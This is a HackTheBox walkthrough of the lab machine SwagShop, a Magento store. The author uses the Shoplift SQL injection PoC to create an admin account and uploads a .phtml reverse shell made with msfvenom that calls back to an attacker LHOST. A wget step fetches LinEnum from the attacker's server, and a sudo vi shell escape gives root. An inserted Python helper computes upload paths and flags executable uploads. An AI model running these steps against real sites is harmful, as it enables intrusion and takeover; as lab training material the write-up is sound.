HackTheBox | SwagShop Walkthrough

8 min read. Written by Nautilus

I took a small break from doing active machines on HackTheBox while working and writing up some retired ones. SwagShop is my first machine after my very small hiatus, and is rated "easy" difficulty. SwagShop requires enumeration skills, problem solving, and a little bit of perseverance.

Recon and Making Some Spicy Credentials

To begin this machine let's do a basic nmap scan:

nmap -sC -sV 10.10.10.140
-sC: equivalent to --script=default
-sV: Probe open ports to determine service/version info

Looks like we only have two ports - ssh, and a web server. Let's browse to 10.10.10.140 and see if there's anything to help us gain a foothold:

Upon browsing to the site we're presented with a store page. This page has three products, and upon creating an account I found nothing interesting. Let's use dirb to see if we can find anything:

dirb http://10.10.10.140 /usr/share/wordlists/dirb/small.txt

I didn't find anything too interesting from a quick glance at these directories. However, upon further inspection I found that the Magento icon at the top of the page redirected to:

http://10.10.10.140/index.php/

Let's put this newly found URL into dirb and see if we find anything different:

dirb http://10.10.10.140/index.php/ /usr/share/wordlists/dirb/small.txt

From these results we find an admin login. Let's browse over to it and see if we can try some default credentials:

I tried a few default credentials such as admin:admin, administrator:password, and so on. None of them worked, so I finally decided to google Magento admin panel exploits:

After a little research I found out that Magento had a SQL injection vulnerability (the "Shoplift" bug) which allowed attackers to create new administrator accounts, such as ypwq:123. This all sounded great so I decided to look for a PoC:

https://github.com/joren485/Magento-Shoplift-SQLI

Great - now we have a name, and a plan. Let's clone this repository and see if it works:

git clone https://github.com/joren485/Magento-Shoplift-SQLI

Now let's take a look at the code to see if we need to specify anything:

It looks like we just need to specify a target. Let's try running the script first and make any changes we need to if it fails:

Oh.. It worked. Let's try and login with the credentials we've made:

We've successfully logged into the administrator panel!

Popping a Shell and Finding User.txt

Since I found so many vulnerabilities earlier when searching for a way to access the Magento admin panel, I decided to look up vulnerabilities to pop a shell. This little search led me to a YouTube video:

Basically, this video shows you uploading a spooky banned plugin to open up an administrator IDE, and then paste your shell in that way. Let's download this random file from a YouTube description and see if it works... Seems legit.

In the YouTube video we see our hackerman go to the following - System --> Magento Connect --> Magento Connect Manager. Upon browsing to the connect manager we're presented with a login page which accepts our newly created credentials:

Now we're going to want to upload our File_System-1.0.0.tgz file and click upload:

Upon hitting upload we're presented with the following:

Sadly, we're experiencing an error when uploading this file. I looked around for solutions but couldn't find anything. Also it looks like we broke the site:

Yikes, sorry. After looking into a few new exploits, and scouring the internet for the good stuff, I came across the following link:

https://blog.scrt.ch/2019/01/24/magento-rce-local-file-read-with-low-privilege-admin-rights/

This blog post discusses a vulnerability that allows a .php file to be uploaded. That sounds really good. I wasn't able to find anywhere on the site that allowed me to upload a .php file, so this might be a good lead.

Our first step as a logged-in user is to "create a new product, with a new 'Custom Options' of type 'File', with .phtml as an authorized extension and some pieces in stock to order one".

To do so we're going to want to click on "Catalog" and then click on "Add Product". Although there are more options such as inventory, product description, and the product price, we're only concerned with "input type: file" and "allowed file extensions: .phtml". Your "New Product - Custom Options" should look like this:

After browsing to the frontend we can see our newly created product:

Our next step is to click on our newly created product and upload a .phtml reverse shell. This can be quickly created using msfvenom:

msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.phtml

Now we're going to want to upload example.phtml and add our product with the attached file to our cart:

After doing so we can view the product with our shell in our shopping cart:

Before going any further let's set up a handler in metasploit to catch our shell when it pops:

Now the final step to popping our shell is to browse to where the .phtml shell has been uploaded. An example of this is listed in the blog post:

/your/path/to/magento/pub/media/custom_options/quote/firstLetterOfYourOriginalFileName/secondLetterOfYourOriginalFileName/md5(contentOfYourPhtmlFile).phtml

After tinkering with the example a little, our URL should look like this:

10.10.10.140/pub/media/custom_options/quote/e/x/c4aa65039d2df2215225eef74174fe79.phtml

Let's load this up in our web browser:

That didn't work for some reason. Let's try deleting /pub/ from the URL and then loading it:

http://10.10.10.140/media/custom_options/quote/e/x/c4aa65039d2df2215225eef74174fe79.phtml
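To make the path layout concrete, here is an added Python helper (not from the original post or the SCRT article) that derives both candidate web paths from the original file name and the file's content, following the layout quoted above, plus a small check a responder can run over a media listing to flag uploads the web server would execute instead of serving. The sample content ("abc") is constructed; the hash in the post belongs to the author's own file, which is not on the page.

```python
import hashlib
import os
from pathlib import PurePosixPath

# Layout as quoted from the SCRT post (assumed exact):
#   <quote dir>/<1st char of name>/<2nd char of name>/md5(content)<ext>
QUOTE_DIR = "media/custom_options/quote"

# Extensions mentioned on this page that PHP would execute; extend as needed.
EXECUTABLE_EXTS = {".php", ".phtml"}


def quote_upload_path(original_name: str, content: bytes, under_pub: bool = True) -> str:
    """Web path Magento uses for a custom-option file upload.

    under_pub=True gives the /pub/media/... form from the blog post; on this
    box the document root served /media/... directly, hence both variants.
    """
    stem, ext = os.path.splitext(original_name)
    if len(stem) < 2:
        raise ValueError("original file name needs at least two characters")
    digest = hashlib.md5(content).hexdigest()
    parts = (["pub", QUOTE_DIR] if under_pub else [QUOTE_DIR])
    return "/" + "/".join(parts + [stem[0], stem[1], digest + ext])


def candidate_paths(original_name: str, content: bytes) -> list:
    """Both locations worth checking, /pub/ first as the article lists it."""
    return [quote_upload_path(original_name, content, under_pub=True),
            quote_upload_path(original_name, content, under_pub=False)]


def is_executable_upload(web_path: str) -> bool:
    """Detection helper: True if a file under the custom_options/quote tree
    carries an extension the web server would execute rather than serve."""
    in_quote_dir = QUOTE_DIR in web_path
    return in_quote_dir and PurePosixPath(web_path).suffix.lower() in EXECUTABLE_EXTS


if __name__ == "__main__":
    for p in candidate_paths("example.phtml", b"abc"):
        print(p, "executable!" if is_executable_upload(p) else "data")
```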

Sweet! That worked. Now let's check our handler:

Just like that we are in:

Now let's look for the user.txt flag. Let's browse to /home/ and see if there are any users:

Now let's cd into haris and check if we can find the user.txt flag:

And just like that - we can read, and submit the user.txt flag!

Privilege Escalation and Root.txt

Let's make enumeration simple by uploading LinEnum.sh to the machine and running it. We can serve the script from our attacking machine with a SimpleHTTPServer hosting LinEnum.sh:

From here we only have to wget it from the target machine:

Now let's run LinEnum.sh with thorough tests enabled:

bash LinEnum.sh -t 1

I couldn't find anything too interesting in the results (I probably overlooked something), so I started to enumerate manually.

Running sudo -l shows us the following:

Looks like we're able to run /usr/bin/vi on /var/www/html/* as root. Let's try running that exact command with sudo and see what happens:

sudo /usr/bin/vi /var/www/html/*

This is looking good - let's escape to a shell from within vi by typing:

:!/bin/sh

As we can see - the exploit worked and we successfully gained access to a root shell. Let's navigate to /root/ and grab the flag now:

Final Thoughts

I thought this machine was pretty straightforward. Although I can see user.txt being hard for some, root.txt was extremely straightforward with proper enumeration. I think the path was pretty clear the whole way through the machine, and there weren't any major 'rabbit holes'. Finally, I think this machine had a nice little surprise at the end. If you haven't completed it yet then I recommend you give it a shot to see what the surprise is!

Thanks for reading! I hope this post helped you own, and get a better understanding of SwagShop!